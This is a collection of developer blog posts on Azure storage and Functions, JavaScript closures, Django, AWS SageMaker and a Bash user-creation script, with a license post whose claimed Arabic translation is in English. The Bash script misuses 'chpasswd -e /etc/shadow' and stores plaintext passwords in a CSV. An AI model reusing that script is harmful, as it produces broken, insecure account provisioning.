We'll be going over creating a storage account and adding files for private access. Feel free to look at my many posts discussing how to do this if you're confused. 1. **Create a Storage Account and Configure High Availability** - Ensure Geo-redundant storage (GRS) is selected when creating your storage account. - Once your storage account is created, navigate to the resource. ![Creating the storage account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oebhtb7cquns98h7jo6p.jpg) 2. **Create a Storage Container, Upload a File, and Restrict Access** - Locate the **Data storage** section and select **Containers**. ![Locating Containers](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aviny8unxfd3m2y1zqmi.jpg) - Click **+Container**, create a name for your container, then click **Create**. ![Creating the Container](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/56y9524buno2edbbjh9j.jpg) - Navigate to your created container, click **Upload**, add a file, and click **Upload**. ![Uploading a file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ehgjd23z80246gqr1z02.jpg) - Click the file you uploaded, copy the URL link, and paste it into your browser to confirm you're unable to view the file. ![Copying the blob link](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ydrdtnaxg6kfc11d41c8.jpg) ![Verifying the file in inaccessible](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hsbmwcpg8rwo7o2cqero.jpg) 3. **Configure Access with a Shared Access Signature (SAS)** - Go back to your file and click on **Generate SAS**. ![Clicking Generate SAS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/brkmv2lv1mwt89y4kilu.jpg) - Set permissions to **Read** and adjust the **Expiry** to 24 hours from the current time. - Click **Generate SAS token and URL**. ![Configuring expiration time](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bzvvzw8uuwsd3qmt1qs8.jpg) - Copy the generated Blob SAS URL and paste it into your browser to verify access. ![Copying the URL](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/958z9mvireezyp64puld.jpg) ![Viewing the uploaded file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8myd7d790rc92hguqn6y.jpg) 4. **Configure Storage Access Tiers and Content Replication** - Move blobs from the Hot tier to the Cool tier after 30 days to optimize costs. - Navigate back to the overview of your Storage Account. - Locate **Lifecycle Management** under **Data Management**. ![Changing the lifecycle](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9kjyiu0wpy7n1pc1nhaf.jpg) - Click **Add a rule**. ![Locating the Lifecycle Rules](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nsy8ray8klflsq31w4r7.jpg) - Create a name for your rule, leave other settings as default, and click **Next**. ![Naming the rule](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zgrxngqnebu1q15r92pj.jpg) - Set the if condition to **Last Modified** and change **More than (days ago)** to **30**. - Change the then condition to **Move to cool storage** and click **Add**. ![Creating the rule conditions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6y7bzvzcnop1opsrpd2w.jpg) We've now configured a lifecycle policy for our private files. Remember to delete all resources once you're done.
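The SAS step can also be scripted instead of using the portal. The sketch below assumes placeholder account, container, and blob names, and that you are authenticated with sufficient permissions; adjust the expiry to roughly 24 hours from the current time as described above.

```sh
# Generate a read-only SAS token for a single blob, valid until the given expiry (UTC)
az storage blob generate-sas \
  --account-name myprivatestorageacct \
  --container-name mycontainer \
  --name myfile.txt \
  --permissions r \
  --expiry 2024-07-06T00:00Z \
  --https-only \
  --output tsv
```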
jimiog
1,912,028
Implementing a Serverless Application with Azure Functions
In this article, we will walk through step-by-step how to create and deploy a serverless function...
0
2024-07-04T22:21:26
https://dev.to/dylantv/implementing-a-serverless-application-with-azure-functions-9bn
In this article, we will walk through step-by-step how to create and deploy a serverless function using Azure Functions. We'll use a practical example of an HTTP function that greets users based on the name provided in the request.

Step 1: Creating the Function in Azure Functions

1) Access Azure Portal:
- Sign in to portal.azure.com using your Azure credentials.

2) Create a New Resource:
- Click on "+ Create a resource" in the upper left corner.
- Search for and select "Azure Function" in the Azure marketplace.
- Configure basic details like subscription, resource group, function name, and location.

3) Function Configuration:
- Choose the consumption plan to leverage serverless execution.
- Select the "HTTP trigger" template to start with a basic HTTP trigger.

4) Create the Function:
- Click on "Review and create" and then "Create" to deploy the function in Azure.

Step 2: Implementing the Function Code

1) Function Development:
- Implement the following code in your function. This code will handle GET and POST requests to greet the user based on the provided name.

```csharp
using System.IO;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Azure.WebJobs;
using Microsoft.Azure.WebJobs.Extensions.Http;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.Logging;
using Newtonsoft.Json;

public static class HttpTriggerExample
{
    [FunctionName("HttpTriggerExample")]
    public static async Task<IActionResult> Run(
        [HttpTrigger(AuthorizationLevel.Function, "get", "post", Route = null)] HttpRequest req,
        ILogger log)
    {
        log.LogInformation("C# HTTP trigger function processed a request.");

        string name = req.Query["name"];

        string requestBody = await new StreamReader(req.Body).ReadToEndAsync();
        dynamic data = JsonConvert.DeserializeObject(requestBody);
        name = name ?? data?.name;

        return name != null
            ? (ActionResult)new OkObjectResult($"Hello, {name}")
            : new BadRequestObjectResult("Please pass a name on the query string or in the request body");
    }
}
```

2) Code Explanation:
- The HttpTriggerExample function handles incoming HTTP requests.
- It retrieves the name from query parameters (req.Query["name"]) or from the request body if provided in JSON format.

Step 3: Configuring Triggers

1) HTTP Trigger Configuration:
- In the Azure Functions portal, select your function.
- Go to the "Triggers" tab and click on "+ Add trigger".
- Choose "HTTP trigger" and configure details like HTTP method (GET, POST, etc.) and authorization options if needed.

Conclusion

In this article, we explored how to create a serverless application using Azure Functions. You learned how to configure an HTTP trigger, implement code to handle requests, and how to test your function using various HTTP request tools. Azure Functions simplifies the development and deployment of serverless applications, offering automatic scalability and a consumption-based pricing model. Experiment with different triggers and functions to build efficient and scalable applications in Azure.
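As a quick way to exercise the deployed HTTP trigger from the command line, requests along these lines could be used. The host name and function key are placeholders; with function-level authorization, the key is passed via the `code` query parameter.

```sh
# GET variant, passing the name on the query string (placeholder host and key)
curl "https://<app-name>.azurewebsites.net/api/HttpTriggerExample?name=Azure&code=<function-key>"

# POST variant, passing the name in the JSON body
curl -X POST "https://<app-name>.azurewebsites.net/api/HttpTriggerExample?code=<function-key>" \
  -H "Content-Type: application/json" \
  -d '{"name": "Azure"}'
```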
dylantv
1,912,015
https://codepen.io/abpqaucj-the-builder/pen/abgoyjR)
Here you go, here is the translation of the text into Arabic: Copyright © 2024 by Sandy Hamed...
0
2024-07-04T22:03:39
https://dev.to/__eec1462357e217/httpscodepenioabpqaucj-the-builderpenabgoyjr-130m
Here you go, here is the translation of the text into Arabic:

---

Copyright © 2024 by Sandy Hamed (https://codepen.io/abpqaucj-the-builder/pen/abgoyjR)

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, and license and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, provided that the above copyright notice and this permission notice are included in all copies or substantial portions of the Software.

The Software is provided "as is", without warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and noninfringement. In no event shall the authors or copyright holders be liable for any claim, damages, or other liability, whether in an action of contract, tort, or otherwise, arising from, out of, or in connection with the Software or its use or other dealings in the Software.
__eec1462357e217
1,911,913
Introduction to Functional Programming in JavaScript: Closure #2
Closures are a fundamental concept in JavaScript that every developer should understand. They play a...
27,958
2024-07-04T22:00:00
https://dev.to/francescoagati/introduction-to-functional-programming-in-javascript-closure-2-4m4g
javascript
Closures are a fundamental concept in JavaScript that every developer should understand. They play a crucial role in functional programming and are essential for creating more advanced functionality in JavaScript applications. #### What is a Closure? A closure is a function that has access to its own scope, the scope of the outer function, and the global scope. This means that a closure can access variables and parameters from its own function scope, the scope of the function that contains it, and any global variables. In other words, a closure allows a function to "remember" the environment in which it was created, even after the outer function has finished executing. #### How Closures Work To understand how closures work, let's look at a simple example: ```javascript function outerFunction() { let outerVariable = 'I am from the outer function'; function innerFunction() { console.log(outerVariable); } return innerFunction; } const myClosure = outerFunction(); myClosure(); // Output: 'I am from the outer function' ``` In this example: - `outerFunction` creates a variable `outerVariable` and defines `innerFunction`, which accesses `outerVariable`. - `innerFunction` is returned from `outerFunction` and assigned to `myClosure`. - When `myClosure` is called, it still has access to `outerVariable` from `outerFunction`'s scope, even though `outerFunction` has already finished executing. This ability of the `innerFunction` to access the variables from the outer function's scope after the outer function has completed execution is what defines a closure. #### Practical Uses of Closures Closures have many practical applications in JavaScript. Let's explore a few common use cases: 1. **Data Encapsulation** Closures can be used to create private variables that cannot be accessed directly from outside the function. ```javascript function createCounter() { let count = 0; return { increment: function() { count++; return count; }, decrement: function() { count--; return count; } }; } const counter = createCounter(); console.log(counter.increment()); // 1 console.log(counter.increment()); // 2 console.log(counter.decrement()); // 1 ``` In this example, `count` is encapsulated within the closure created by `createCounter`, making it inaccessible from the outside. 2. **Function Factories** Closures can be used to create functions dynamically based on input parameters. ```javascript function createMultiplier(multiplier) { return function(number) { return number * multiplier; }; } const double = createMultiplier(2); const triple = createMultiplier(3); console.log(double(5)); // 10 console.log(triple(5)); // 15 ``` Here, `createMultiplier` returns a new function that multiplies its input by a specified `multiplier`. Each created function maintains its own `multiplier` value through closures. 3. **Callbacks and Event Handlers** Closures are often used in asynchronous programming, such as with callbacks and event handlers. ```javascript function fetchData(url) { return function(callback) { // Simulate an asynchronous operation setTimeout(() => { const data = `Data from ${url}`; callback(data); }, 1000); }; } const fetchFromAPI = fetchData('https://api.example.com'); fetchFromAPI((data) => { console.log(data); // Output after 1 second: 'Data from https://api.example.com' }); ``` In this example, `fetchData` returns a function that accepts a callback. This callback has access to the `url` variable even after the delay, demonstrating the power of closures in asynchronous code.
francescoagati
1,912,014
Automating User Management with a Bash Script
Managing users in a Linux environment can be daunting, especially when dealing with multiple users...
0
2024-07-04T21:57:26
https://dev.to/donfolayan/user-creation-automation-in-linux-with-bash-scripts-3p61
bashscript, cloud, linux, bash
Managing users in a Linux environment can be daunting, especially when dealing with multiple users and groups. We can leverage a Bash script to automate user creation, group assignment, and password management to streamline this process. This article walks through creating a robust user management script designed to automate these tasks while ensuring security and logging every step. This script was created for the [HNG Internship program](https://hng.tech/) and demonstrates practical scripting applications. ## Overview of the Script The script ensures it runs with root privileges, checks for an input file containing user data, and processes each user entry to create users, assign them to groups, and manage their passwords. Here’s a breakdown of each part of the script: - **Checking for Root Privileges:** The script starts by checking if it is run as the root user. This is crucial because user management commands require elevated privileges. ``` #!/bin/bash if [[ $EUID -ne 0 ]]; then echo "Error: This script requires root privileges." echo "Please run with sudo: sudo ./create_users.sh" exit 1 fi ``` - **Input File Validation:** Next, the script checks if an input file is provided. This file should contain user data formatted as username;group1,group2. ``` if [ $# -eq 0 ]; then echo "Error: Please provide an input file name as an argument." exit 1 fi input_file="$1" ``` - **Logging Function:** A logging function is defined to record actions taken by the script. This function writes messages to a log file with a timestamp. ``` log_message() { local message="$1" echo "$(date +'%Y-%m-%d %H:%M:%S') - $message" >> /var/log/user_management.log } ``` - **Group Addition Function:** The group_add function reads the groups from the input and adds the user to each group. It also creates any groups that do not exist. ``` group_add() { IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do if ! getent group "$group" &>/dev/null; then groupadd "$group" log_message "Created group '$group'." fi usermod -a -G "$group" "$username" log_message "User: $username added to group: $group" done } ``` - **Directory and File Setup:** The script creates necessary directories and files for logging and storing user passwords securely. ``` mkdir -p /var/secure /var/log chmod 750 /var/secure /var/log touch /var/log/user_management.log chmod 640 /var/log/user_management.log touch /var/secure/user_passwords.csv chmod 600 /var/secure/user_passwords.csv ``` - **Processing the Input File:** The main part of the script reads each line from the input file, processes user data, and performs the following steps: 1. Removes leading/trailing whitespace. 2. Checks if the user already exists. 3. Creates new users and their home directories. 4. Assigns users to specified groups. 5. Generates and sets random passwords. 6. Logs each action for audit purposes. ``` while IFS=';' read -r username groups; do # Remove leading/trailing whitespace username="${username##* }" username="${username%% *}" groups="${groups##* }" groups="${groups%% *}" # Skip empty lines if [ -z "$username" ]; then continue fi # Check if user exists if id "$username" &>/dev/null; then log_message "User $username already exists" group_add continue else # Create user and personal group useradd -m -s /bin/bash "$username" log_message "Created user '$username' and group '$username'." fi # Create/add user to additional groups if [ -n "$groups" ]; then IFS=',' read -ra groupName <<< "$groups" for group in $(echo "$groups" | tr ',' ' '); do if ! 
getent group "$group" &>/dev/null; then groupadd "$group" log_message "Created group '$group'." fi usermod -a -G "$group" "$username" log_message "User: $username added to group: $group" done fi # Ensure home directory exists and set permissions home_dir="/home/$username" if [ ! -d "$home_dir" ]; then mkdir "$home_dir" fi chown "$username:$username" "$home_dir" chmod 700 "$home_dir" # Generate random password, store securely, and update log password=$(head /dev/urandom | tr -dc A-Za-z0-9 | fold -w 16 | head -n 1) echo "$username,$password" >> /var/secure/user_passwords.csv log_message "Generated password for user '$username' and stored securely." # Set user password echo "$username:$password" | chpasswd -e /etc/shadow # Successful user creation echo "User '$username' created successfully with password stored in /var/secure/user_passwords.csv (READ-ONLY)." log_message "User '$username' creation completed." done < "$input_file" echo "User creation script completed. Refer to /var/log/user_management.log for details." ``` ## Security Considerations The provided script demonstrates password storage in a plain text file. In a production environment, implement secure password management practices like password hashing or integration with a directory service. Additionally, the script should be run with least privilege principles in mind. ## Prerequisites Before using this file, ensure you have the following: - *Linux System:* The script is designed for use on Linux systems with Bash as the default shell. - *Bash Shell:* Basic understanding of Bash scripting is helpful. - *Essential Utilities:* The script utilizes utilities like useradd, groupadd, sed, chmod, openssl, chpasswd, and date. Make sure these are available on your system. - *Root Privileges:* The script requires running with root privileges to create user accounts and modify system directories. You can use sudo to run the script with elevated permissions. - *user_data.txt File:* This file needs to exist in the same directory as the script and define usernames and groups (one line per user, semicolon separated). This Bash script provides a comprehensive solution for automating user management in a Linux environment. By ensuring root privileges, validating input, and logging every action, it helps maintain security and auditability. The script can be further extended or customized to meet specific requirements, making it a valuable tool for system administrators. For further exploration of system administration and automation techniques, consider exploring the HNG Internship program (https://hng.tech/internship) or the HNG Premium membership (https://hng.tech/premium) for access to additional resources and professional development opportunities.
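For illustration, an input file in the `username;group1,group2` format that the script expects could be created and the script run with root privileges as shown below. The usernames and groups here are made up purely as an example.

```sh
# Create an example user_data.txt (usernames and groups are illustrative)
cat > user_data.txt <<'EOF'
light;sudo,dev,www-data
idimma;sudo
mayowa;dev,www-data
EOF

# Run the script with elevated permissions, passing the input file as the argument
sudo bash create_users.sh user_data.txt
```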
donfolayan
1,912,013
Why Still Use Django Over FastAPI?
As a developer, I continue to use Django despite all the hype around FastAPI. You might be thinking,...
0
2024-07-04T21:54:13
https://dev.to/seifalmotaz/why-still-use-django-over-fastapi-5b0d
python, django, fastapi, softwareengineering
As a developer, I continue to use Django despite all the hype around FastAPI. You might be thinking, "Dude, why complicate things? Just use FastAPI and make it simple." Let's dive into this topic by discussing some use case scenarios where Django still shines. ## My Work Context I work as a freelancer on various projects and also in a company setting. My primary role is as a mobile application developer using Dart/Flutter. This means that my work often involves creating MVPs (Minimum Viable Products) and startup projects that need to go into production as quickly as possible. This requires a software engineer to be mindful of several factors: ### Developer Time and Popularity First, there's the cost of developer time and the popularity of the language or framework being used. Choosing a well-known and widely-used framework can save time and resources in the long run. ### Speed and Efficiency Second, time is of the essence. As a developer, my main focus is on reducing the time spent developing and maintaining project code. This includes writing code, deploying it, migrating it, and testing it. Additionally, I need to be able to fix bugs quickly and add features as soon as possible, especially for startups. There's simply no time to be constantly migrating database schemas or worrying about the code not starting. ## The Solution: Why Django? To address these challenges, I focus on a few key points: ### Using Python Python is incredibly popular due to its ease of use and the robust libraries it offers. This makes it easy to get developers up to speed and working on a project quickly, especially if the project is well-documented (which, as a diligent software engineer, I ensure it is! 😊). ### Using Django As part of the Python ecosystem, Django is a robust framework that many rely on for production-ready applications. While it does have its downsides, which we'll discuss later, it offers several benefits that make it a solid choice over FastAPI: - **ORM (Object-Relational Mapping)**: Django's ORM simplifies database interactions, allowing for effortless migrations and providing an array of field types that cover almost every need a developer might have. - **Admin Panel**: The Django admin panel is one of my favorite features. It saves a tremendous amount of time for startups and clients by providing a ready-made interface to manage application data. While a custom admin panel might be necessary down the line, the default admin panel is a great starting point for early-stage projects. - **Extensions**: Django has a rich ecosystem of extensions that can be easily integrated, further speeding up the development process. - **Authentication**: Built-in authentication support in Django simplifies the implementation of user management, saving time and effort. Additionally, Django signals are a crucial feature for me. They provide a way to trigger events and execute code in response to changes in the data, eliminating the need to create a custom system for it. ## APIs for Mobile Applications Given that I primarily develop mobile applications, APIs are a crucial part of my work. To be fair, FastAPI does offer a significant benefit with its OpenAPI generated schema. This feature greatly enhances developer productivity by providing automatically generated API documentation. Front-end developers appreciate this as it allows them to get API docs quickly and use client-side generators with the OpenAPI file/code. ### Combining Django with Django Ninja To leverage this benefit, I use Django Ninja. 
While I'm not a fan of Django REST Framework (DRF) due to its performance and reliance on "magic," Django Ninja strikes a balance. It's similar to FastAPI in its simplicity and effective use of type hinting, but it doesn't overload with unnecessary features. Django Ninja also utilizes Pydantic for data validation, which adds to its robustness. ## Embracing the Magic of Django A lot of senior backend developers tend to dislike the "magic" that Django offers. However, as an experienced software engineer, I see this magic as a good thing—especially when you understand how it works behind the scenes. By reading the Django documentation and gaining familiarity with other frameworks like Flask, FastAPI, and SQLAlchemy, you can demystify the magic. This understanding enables you to appreciate the productivity boost that Django's abstractions provide. ## The Cons of Django While Django has many strengths, it's important to be aware of its limitations, especially when choosing it for a project. Here are some cons from my perspective, particularly in the context of building MVPs: ### Async Code Although Django 5 has introduced support for async code, it remains a fundamentally synchronous framework. Many of its components are not optimized for asynchronous operations, which can be a limitation if your project requires extensive async functionality. ### Performance and Memory Usage Django can be resource-intensive. A bare metal project using Django typically consumes at least 40 MB of RAM, which can be a lot compared to other frameworks. This can be a concern if you're working on a project with strict memory usage requirements. ### Real-Time Capabilities Django is not the best choice for applications that depend heavily on real-time features like WebSockets or Server-Sent Events (SSE). For projects requiring real-time communication, Python as a whole might not be the best option. In such cases, I would prefer using Node.js or Go, depending on the specific project requirements. # Conclusion In conclusion, while FastAPI presents compelling advantages in API generation and performance, Django remains my preferred choice for backend development in mobile application MVP projects. Its robust ecosystem, ease of use within the Python ecosystem, and productivity-enhancing features like the admin panel outweigh its limitations in async operations and real-time capabilities. Understanding these trade-offs ensures I can effectively choose and utilize Django for projects requiring rapid development and scalability.
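As a small illustration of the Django Ninja approach mentioned above, here is a minimal sketch of an endpoint. The module layout and names are my own and not taken from any particular project; type hints drive both request validation and the generated OpenAPI schema.

```python
# api.py - minimal Django Ninja API (illustrative names)
from ninja import NinjaAPI, Schema

api = NinjaAPI()

class GreetingOut(Schema):
    message: str

@api.get("/hello", response=GreetingOut)
def hello(request, name: str = "world"):
    # The "name" query parameter is parsed and validated from the type hint
    return {"message": f"Hello, {name}"}
```

```python
# urls.py - mount the API under /api/
from django.contrib import admin
from django.urls import path

from .api import api

urlpatterns = [
    path("admin/", admin.site.urls),
    path("api/", api.urls),
]
```

With this in place, Django Ninja serves interactive OpenAPI documentation (by default under /api/docs when mounted at api/), which is exactly the kind of generated schema that front-end developers appreciate.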
seifalmotaz
1,912,011
[Game of Purpose] Day 47 - Sync engine with a battery
Today I implemented engine synchronization with a battery. When I turn the engine on, the battery is...
27,434
2024-07-04T21:45:45
https://dev.to/humberd/game-of-purpose-day-47-sync-engine-with-a-battery-oj6
gamedev
Today I implemented engine synchronization with a battery. When I turn the engine on, the battery also starts to drain. When I turn the engine off, the battery stops draining. {% embed https://youtu.be/DbJU-rqd-dQ %}
humberd
1,912,010
A Dead Space collaboration has been announced for Battlefield 2042
A previously unscheduled event is coming soon to the multiplayer shooter Battlefield 2042, and...
0
2024-07-04T21:43:09
https://dev.to/lvgames______6d796a00b5ca/v-battlefield-2042-anonsirovali-kollaboratsiiu-s-dead-space-bbd
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8pqnjktvgl43pnskvsr6.jpg) A previously unscheduled event is coming soon to the multiplayer shooter [Battlefield 2042](https://lvgames.info/2024/07/05/v-battlefield-2042-anonsirovali-kollaboratsiyu-s-dead-space.html), and for some players it will be an unusual one. Electronic Arts has announced a crossover with Dead Space. The crossover takes place as part of the new "Outbreak" event, which starts on July 9, 2024 and runs until July 16, 2024, so you will have a week to complete all the required challenges. "In the Outbreak event, squads will demonstrate their resilience and ingenuity in the fight against a ruthless new enemy as they attempt to escape the Boreas laboratory," the announcement reads. By taking part, you can unlock free rewards such as a weapon charm and a skin, and there is also a unique player card background. Naturally, the developers have not forgotten a special bundle for players willing to spend a bit of money on it.
lvgames______6d796a00b5ca
1,912,009
Building Custom Generative Models with AWS: A Comprehensive Tutorial
Generative AI models have revolutionized the fields of natural language processing, image generation,...
0
2024-07-04T21:41:58
https://medium.com/@drishtijjain/building-custom-generative-models-with-aws-a-comprehensive-tutorial-d68f5f25e557
aws, llm, generative, ai
Generative AI models have revolutionized the fields of natural language processing, image generation, and more. Building and fine-tuning these models can seem daunting, but AWS offers a suite of tools and services to streamline the process. In this blog, we will walk through the steps to develop and fine-tune a custom generative model using AWS services. I’ll cover data preprocessing, model training, and deployment. ## Prerequisites Before we begin, ensure you have the following: - An AWS account - Basic knowledge of Python and machine learning - AWS CLI installed and configured ## Step 1: Setting Up Your AWS Environment ### 1.1. Creating an S3 Bucket Amazon S3 (Simple Storage Service) is essential for storing the datasets and model artifacts. Let’s create an S3 bucket. 1. Log in to the AWS Management Console. 2. Navigate to the S3 service. 3. Click on “Create bucket.” 4. Provide a unique name for your bucket and select a region. 5. Click “Create bucket.” ### 1.2. Setting Up IAM Roles IAM (Identity and Access Management) roles allow AWS services to interact securely. Create a role for your SageMaker and EC2 instances. 1. Navigate to the IAM service. 2. Click on “Roles” and then “Create role.” 3. Select “SageMaker” as the service and attach the “AmazonSageMakerFullAccess” policy. 4. Name your role and click “Create role.” ## Step 2: Preparing Your Data Data is the cornerstone of any AI model. For this tutorial, I’ll use a text dataset to build a text generation model. The data preprocessing steps involve cleaning and organizing the data for training. ### 2.1. Uploading Data to S3 1. Navigate to your S3 bucket. 2. Click “Upload” and select your dataset file. 3. Click “Upload.” ### 2.2. Data Preprocessing with AWS Glue AWS Glue is a managed ETL (Extract, Transform, Load) service that can help preprocess your data. 1. Navigate to the AWS Glue service. 2. Create a new Glue job. 3. Write a Python script to clean and preprocess your data. For example: {% embed https://gist.github.com/DrishtiJ/6c9871a961da6dbeaf3738aabb421620 %} 4. Run the Glue job and ensure the cleaned dataset is uploaded back to S3. ## Step 3: Training Your Generative Model with SageMaker Amazon SageMaker is a fully managed service that provides every developer and data scientist with the ability to build, train, and deploy machine learning models quickly. ### 3.1. Setting Up a SageMaker Notebook Instance 1. Navigate to the SageMaker service. 2. Click “Notebook instances” and then “Create notebook instance.” 3. Choose an instance type (e.g., ml.t2.medium for testing purposes). 4. Attach the IAM role you created earlier. 5. Click “Create notebook instance.” ### 3.2. Preparing the Training Script Next, prepare a training script. For this tutorial, we’ll use a simple RNN model built with PyTorch. {% embed https://gist.github.com/DrishtiJ/34aace51e5a3cae2799fc8e3bbe2e497 %} ### 3.3. Training the Model 1. Open your SageMaker notebook instance. 2. Upload the training script. 3. Run the script to train the model. Ensure the training data is loaded from S3. ## Step 4: Fine-Tuning Your Model Fine-tuning involves adjusting hyperparameters or further training the model on a more specific dataset to improve its performance. ### 4.1. Hyperparameter Tuning with SageMaker 1. Navigate to the SageMaker service. 2. Click on “Hyperparameter tuning jobs” and then “Create hyperparameter tuning job.” 3. Specify the training job details and the hyperparameters to tune, such as learning rate and batch size. 4. 
Start the tuning job and review the results to select the best model configuration. ### 4.2. Transfer Learning Transfer learning can be employed by initializing your model with pre-trained weights and further training it on your specific dataset. {% embed https://gist.github.com/DrishtiJ/c390bfe38269efa9944dbc54ee074240 %} ## Step 5: Deploying Your Model Once your model is trained and fine-tuned, it’s time to deploy it for inference. ### 5.1. Creating a SageMaker Endpoint 1. Navigate to the SageMaker service. 2. Click on “Endpoints” and then “Create endpoint.” 3. Specify the model details and instance type. 4. Deploy the endpoint. ### 5.2. Inference with the Deployed Model Use the deployed endpoint to make predictions. {% embed https://gist.github.com/DrishtiJ/39eca269825e4a7feb9d0ad96f902bb3 %} Building custom generative models with AWS is a powerful way to leverage the scalability and flexibility of the cloud. By using services like S3, Glue, SageMaker, and IAM, you can streamline the process from data preprocessing to model training and deployment. Whether you’re generating text, images, or other forms of content, AWS provides the tools you need to create and fine-tune your generative models efficiently. Happy modeling! Thank you for reading. If you have read this far, please like the article. Do follow me on [Twitter](http://twitter.com/drishtijjain) and [LinkedIn](http://linkedin.com/in/jaindrishti/)! Also, my [YouTube Channel](http://youtube.com/drishtijjain) has some great tech content, podcasts and much more!
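For readers who prefer scripting the console steps above, here is a minimal boto3 sketch covering the data upload from Step 2.1 and the endpoint call from Step 5.2; the bucket name, file name, endpoint name, and JSON payload shape are assumptions that depend on your own setup and inference script:

```python
# aws_sketch.py - minimal boto3 sketch; bucket, key, endpoint name, and payload shape are placeholders
import json

import boto3

s3 = boto3.client("s3")
runtime = boto3.client("sagemaker-runtime")

# Step 2.1 scripted: upload the raw dataset to the bucket created earlier
s3.upload_file("dataset.txt", "my-generative-models-bucket", "raw/dataset.txt")

# Step 5.2 scripted: send a prompt to the deployed SageMaker endpoint
response = runtime.invoke_endpoint(
    EndpointName="my-text-gen-endpoint",
    ContentType="application/json",
    Body=json.dumps({"prompt": "Once upon a time"}),
)
print(response["Body"].read().decode("utf-8"))
```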
drishtijjain